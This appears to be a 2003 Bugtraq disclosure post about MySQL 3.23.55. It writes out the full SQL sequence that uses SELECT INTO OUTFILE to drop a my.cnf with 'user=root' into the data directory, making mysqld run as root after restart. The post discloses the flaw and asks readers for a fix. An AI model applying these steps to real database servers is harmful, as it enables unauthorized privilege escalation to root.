Date: Sat, 8 Mar 2003 12:58:37 +0100
From: "[email protected]?=" <[email protected]>
To: =?iso-8859-1?Q?bugtraq?= <[email protected]>
Subject: MySQL user can be changed to root
Hi. I tried this on my own MySQL 3.23.55 !!!=0D=0AI found out that loggin=
g as the root user, we can change mysqld to run as root instead that i.e.=
mysql but this works only if there's just one my.cnf file and it is loca=
te in /etc...=0D=0AHere's how I did it...=0D=0A=0D=0AI logged in as root =
and than I did this:=0D=0A=0D=0Amysql>CREATE DATABASE roottext;=0D=0Amysq=
l>USE roottext;=0D=0Amysql>CREATE TABLE hack (conf VARCHAR(80));=0D=0Amys=
ql>INSERT IN hack VALUES ('[mysqld]');=0D=0Amysql>INSERT IN hack VALUES (=
'user=3Droot');=0D=0Amysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/=
my.cnf' FROM hack=0D=0Amysql>QUIT=0D=0A=0D=0ADoing so we have create a my=
.cnf in mysql datadir containing:=0D=0A=0D=0A[mysqld]=0D=0Auser=3Droot=0D=
=0A=0D=0ANow, when the mysql server will be restarted, the user option in=
our datadit my.cnf will override the one in /etc/my.cnf and mysql server=
will run as root, with all the security flwas that it takes...=0D=0AThis=
is very dangerous if we think that in mysql <=3D 3.23.53 it is really ea=
sy to get root access due to a bug (an exploit has been released publicly=
)...=0D=0AI dunno how this problem can be solved, I'd like to hear from y=
ou something...=0D=0AThanks.... :)=0D=0Aby=0D=0AGufino
